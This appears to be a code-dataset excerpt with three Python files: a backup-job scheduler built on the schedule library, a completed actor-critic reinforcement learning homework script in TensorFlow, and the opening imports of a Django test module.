source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
job_scheduler.py
|
import logging
from threading import Thread, Lock
from schedule import Scheduler, Job, ScheduleError, ScheduleValueError
from resticweb.tools.job_build import JobBuilder
from resticweb.tools.local_session import LocalSession
from resticweb.models.general import Schedule, ScheduleJobMap
from wtforms import ValidationError
from time import sleep
from datetime import datetime, timedelta
from queue import Queue, Empty
import json
import random
class JobScheduler(Scheduler):
t_lock = Lock()
# janky way of updating the next_run for each schedule after
# the job runs
update_queue = Queue()
def __init__(self):
super().__init__()
#self.logger = logging.getLogger("mainLogger")
missed_schedules = []
with LocalSession() as session:
schedules = session.query(Schedule)
for schedule in schedules:
if self.should_run_missed_schedule(schedule):
missed_schedules.append(schedule.id)
if schedule.next_run is not None and schedule.next_run < datetime.now():
schedule.next_run = self.init_schedule(schedule)
else:
schedule.next_run = self.init_schedule(schedule, schedule.next_run)
session.commit()
for missed_schedule in missed_schedules:
self.populate_queue_from_schedule_id(missed_schedule)
#print(self.jobs)
def pause_schedule(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
schedule.paused = True
schedule.next_run = None
session.commit()
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
def resume_schedule(self, schedule_id):
#schedule_missed = False
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# if self.should_run_missed_schedule(schedule):
# schedule_missed = True
schedule.paused = False
schedule.next_run = self.init_schedule(schedule)
session.commit()
#if schedule_missed:
# self.populate_queue_from_schedule_id(schedule_id)
def toggle_pause(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
paused = schedule.paused
if paused:
self.resume_schedule(schedule_id)
else:
self.pause_schedule(schedule_id)
def should_run_missed_schedule(self, schedule):
if not schedule.next_run:
return False
minute_delta = (datetime.now() - schedule.next_run).seconds / 60
return minute_delta < schedule.missed_timeout and minute_delta > 0
def init_schedule(self, schedule, _next_run=None):
if not schedule.paused:
self.t_lock.acquire()
time_unit = schedule.time_unit
next_run = None
if time_unit != 'week' and time_unit != 'weeks':
if time_unit == 'minute':
job = self.every().minute.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'minutes':
job = self.every(schedule.time_interval).minutes.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'hour':
job = job = self.every().hour.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'hours':
job = self.every(schedule.time_interval).hours.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'day':
job = self.every().day.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'days':
job = self.every(schedule.time_interval).days.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'week':
job = self.every().week.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'weeks':
job = self.every(schedule.time_interval).weeks.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'monday':
job = self.every().monday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'tuesday':
job = self.every().tuesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'wednesday':
job = self.every().wednesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'thursday':
job = self.every().thursday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'friday':
job = self.every().friday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'saturday':
job = self.every().saturday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif time_unit == 'sunday':
job = self.every().sunday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
if schedule.time_at and len(schedule.time_at) > 0:
try:
job.at(schedule.time_at)
except ScheduleValueError:
pass
job._schedule_next_run()
if _next_run:
job.next_run = _next_run
next_run = job.next_run
else:
next_run = self.process_week_schedule(schedule, _next_run)
self.t_lock.release()
return next_run
def process_week_schedule(self, schedule, _next_run=None):
scheduled_days = json.loads(schedule.days)
closest_time = None
for day in scheduled_days:
if day == 'monday':
job = self.every().monday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'tuesday':
job = self.every().tuesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'wednesday':
job = self.every().wednesday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'thursday':
job = self.every().thursday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'friday':
job = self.every().friday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'saturday':
job = self.every().saturday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
elif day == 'sunday':
job = self.every().sunday.do(self.populate_queue_from_schedule_id, schedule_id=schedule.id).tag(schedule.id)
job.interval = schedule.time_interval if schedule.time_interval else 1
if schedule.time_at and len(schedule.time_at) > 0:
try:
job.at(schedule.time_at)
except ScheduleValueError:
pass
job._schedule_next_run()
if (closest_time is None or job.next_run < closest_time):
closest_time = job.next_run
return closest_time
def run_background(self):
self.scheduler_thread = Thread(target=self.run, daemon=True)
self.scheduler_thread.start()
def run(self):
while True:
self.run_pending()
self.process_update_queue()
sleep(5)
# need to customize the Job object itself a bit so we have to change
# the "every" method to use the CustomJob instead of the regular Job
def every(self, interval=1):
"""
Schedule a new periodic job.
:param interval: A quantity of a certain time unit
:return: An unconfigured :class:`Job <Job>`
"""
job = CustomJob(interval, self)
return job
def process_update_queue(self):
self.t_lock.acquire()
while True:
try:
item = self.update_queue.get(block=False)
self.update_next_run(item)
except Empty:
self.t_lock.release()
return
# gets the next run time from the scheduler instance and stores it in the
# database's schedule table
def update_next_run(self, schedule_id):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# schedule.next_run = self.get_job_from_tag(schedule_id).next_run
schedule.next_run = self.get_next_run_from_tag(schedule_id)
session.commit()
def get_job_from_tag(self, tag):
for job in self.jobs:
if tag in job.tags:
return job
return None
def get_next_run_from_tag(self, tag):
jobs = self.get_jobs_from_tag(tag)
closest_time = None
for job in jobs:
if closest_time is None or job.next_run < closest_time:
closest_time = job.next_run
return closest_time
def get_jobs_from_tag(self, tag):
job_list = []
for job in self.jobs:
if tag in job.tags:
job_list.append(job)
return job_list
def populate_queue_from_schedule_id(self, schedule_id):
self.t_lock.acquire()
self.update_queue.put(schedule_id)
self.t_lock.release()
self.t_lock.acquire()
job_ids = []
with LocalSession() as session:
schedule_job_maps = session.query(ScheduleJobMap).filter_by(schedule_id=schedule_id).order_by(ScheduleJobMap.sort.asc())
for job_map in schedule_job_maps:
job_ids.append(job_map.job_id)
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
# schedule.next_run = self.get_job_from_tag(schedule_id).next_run
schedule.next_run = self.get_next_run_from_tag(schedule_id)
session.commit()
for job_id in job_ids:
builder = JobBuilder(saved_job_id=job_id)
builder.run_job()
self.t_lock.release()
def add_schedule(self, name, time_unit, description=None, time_interval=None, time_at=None, missed_timeout=60, jobs=None, scheduled_days=None):
with LocalSession() as session:
new_schedule = Schedule(name=name,
description=description,
time_unit=time_unit,
time_interval=time_interval,
time_at=time_at,
missed_timeout=missed_timeout,
days=json.dumps(scheduled_days))
session.add(new_schedule)
session.commit()
sort_counter = 0
if jobs:
for job_id in jobs:
job_map = ScheduleJobMap(schedule_id=new_schedule.id,
job_id=job_id,
sort=sort_counter)
session.add(job_map)
sort_counter += 1
new_schedule.next_run = self.init_schedule(new_schedule)
session.commit()
def update_jobs(self, schedule_id, jobs):
self.t_lock.acquire()
with LocalSession() as session:
old_jobs = session.query(ScheduleJobMap).filter_by(schedule_id=schedule_id).all()
for job in old_jobs:
session.delete(job)
sort_counter = 0
for job_id in jobs:
new_job = ScheduleJobMap(schedule_id=schedule_id, job_id=job_id, sort=sort_counter)
session.add(new_job)
sort_counter += 1
session.commit()
self.t_lock.release()
def update_schedule(self, name, time_unit, schedule_id, description=None, time_interval=None, time_at=None, missed_timeout=60, scheduled_days=None):
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
schedule.name = name
schedule.description = description
schedule.time_unit = time_unit
schedule.time_interval = time_interval
schedule.time_at = time_at
schedule.missed_timeout = missed_timeout
schedule.days = json.dumps(scheduled_days)
session.commit()
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
schedule.next_run = self.init_schedule(schedule)
session.commit()
def delete_schedule(self, schedule_id):
self.t_lock.acquire()
self.clear(schedule_id)
self.t_lock.release()
with LocalSession() as session:
schedule = session.query(Schedule).filter_by(id=schedule_id).first()
session.delete(schedule)
session.commit()
class CustomJob(Job):
@property
def monday(self):
self.start_day = 'monday'
return self.weeks
@property
def tuesday(self):
self.start_day = 'tuesday'
return self.weeks
@property
def wednesday(self):
self.start_day = 'wednesday'
return self.weeks
@property
def thursday(self):
self.start_day = 'thursday'
return self.weeks
@property
def friday(self):
self.start_day = 'friday'
return self.weeks
@property
def saturday(self):
self.start_day = 'saturday'
return self.weeks
@property
def sunday(self):
self.start_day = 'sunday'
return self.weeks
def _schedule_next_run(self):
"""
Compute the instant when this job should run next.
"""
if self.unit not in ('seconds', 'minutes', 'hours', 'days', 'weeks'):
raise ScheduleValueError('Invalid unit')
if self.latest is not None:
if not (self.latest >= self.interval):
raise ScheduleError('`latest` is greater than `interval`')
interval = random.randint(self.interval, self.latest)
else:
interval = self.interval
self.period = timedelta(**{self.unit: interval})
self.next_run = datetime.now() + self.period
if self.start_day is not None:
if self.unit != 'weeks':
raise ScheduleValueError('`unit` should be \'weeks\'')
weekdays = (
'monday',
'tuesday',
'wednesday',
'thursday',
'friday',
'saturday',
'sunday'
)
if self.start_day not in weekdays:
raise ScheduleValueError('Invalid start day')
weekday = weekdays.index(self.start_day)
days_ahead = weekday - self.next_run.weekday()
if days_ahead <= 0: # Target day already happened this week
days_ahead += 7
#print("--------")
#print(self.next_run)
#print(timedelta(days_ahead))
#print(self.period)
self.next_run += timedelta(days_ahead) - (self.period / self.interval)
#print(self.next_run)
if self.at_time is not None:
if (self.unit not in ('days', 'hours', 'minutes')
and self.start_day is None):
raise ScheduleValueError(('Invalid unit without'
' specifying start day'))
kwargs = {
'second': self.at_time.second,
'microsecond': 0
}
if self.unit == 'days' or self.start_day is not None:
kwargs['hour'] = self.at_time.hour
if self.unit in ['days', 'hours'] or self.start_day is not None:
kwargs['minute'] = self.at_time.minute
self.next_run = self.next_run.replace(**kwargs)
# If we are running for the first time, make sure we run
# at the specified time *today* (or *this hour*) as well
if not self.last_run:
now = datetime.now()
if (self.unit == 'days' and self.at_time > now.time() and
self.interval == 1):
self.next_run = self.next_run - timedelta(days=1)
elif self.unit == 'hours' \
and self.at_time.minute > now.minute \
or (self.at_time.minute == now.minute
and self.at_time.second > now.second):
self.next_run = self.next_run - timedelta(hours=1)
elif self.unit == 'minutes' \
and self.at_time.second > now.second:
self.next_run = self.next_run - \
timedelta(minutes=1)
if self.start_day is not None and self.at_time is not None:
# Let's see if we will still make that time we specified today
if (self.next_run - datetime.now()).days >= 7 * self.interval:
self.next_run -= self.period / self.interval
#print(self.next_run)
#print("--------")
|
train_ac_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
#import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.logging.set_verbosity(tf.logging.ERROR)
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(values, mean=0., std=1.):
values = (values - values.mean()) / (values.std() + 1e-8)
return mean + (std + 1e-8) * values
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR HW2 CODE HERE
with tf.variable_scope(scope):
h = input_placeholder
for i in range(n_layers):
h = tf.layers.dense(h, size, activation=activation, name='h{}'.format(i + 1))
output_placeholder = tf.layers.dense(h, output_size, activation=output_activation, name='output')
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR HW2 CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_HW2 CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size)
return sy_logits_na
else:
# YOUR_HW2 CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'policy_mlp', self.n_layers, self.size)
sy_logstd = tf.get_variable('sy_logstd', [self.ac_dim])
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_HW2 CODE_HERE
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=sy_ac_na,
logits=sy_logits_na
)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_HW2 CODE_HERE
sy = (sy_ac_na - sy_mean) / tf.exp(sy_logstd)
sy_logprob_n = -0.5 * tf.reduce_sum(sy * sy, axis=1)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
# YOUR HW2 CODE HERE
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob.reshape(1, -1)})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
# add the observation after taking a step to next_obs
# YOUR CODE HERE
next_obs.append(ob)
rewards.append(rew)
steps += 1
# If the episode ended, the corresponding terminal value is 1
# otherwise, it is 0
# YOUR CODE HERE
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
# First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
# To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
# This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
# and V(s) when subtracting the baseline
# Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
# otherwise the values will grow without bound.
# YOUR CODE HERE
v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
next_v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + (1 - terminal_n) * self.gamma * next_v_n
adv_n = q_n - v_n
if self.normalize_advantages:
# YOUR_HW2 CODE_HERE
adv_n = normalize(adv_n)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
# Use a bootstrapped target values to update the critic
# Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
# In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
# Every self.num_grad_steps_per_target_update steps, recompute the target values
# by evaluating V(s') on the updated critic
# Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
# otherwise the values will grow without bound.
# YOUR CODE HERE
for i in range(self.num_target_updates):
next_v_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + (1 - terminal_n) * self.gamma * next_v_n
for j in range(self.num_grad_steps_per_target_update):
feed_dict = {
self.sy_ob_no: ob_no,
self.sy_target_n: q_n
}
_ = self.sess.run(self.critic_update_op, feed_dict=feed_dict)
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
# YOUR CODE HERE
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--no_time', '-nt', action='store_true')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--gpu', type=int, default=0)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name
if not args.no_time:
logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
tests.py
|
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
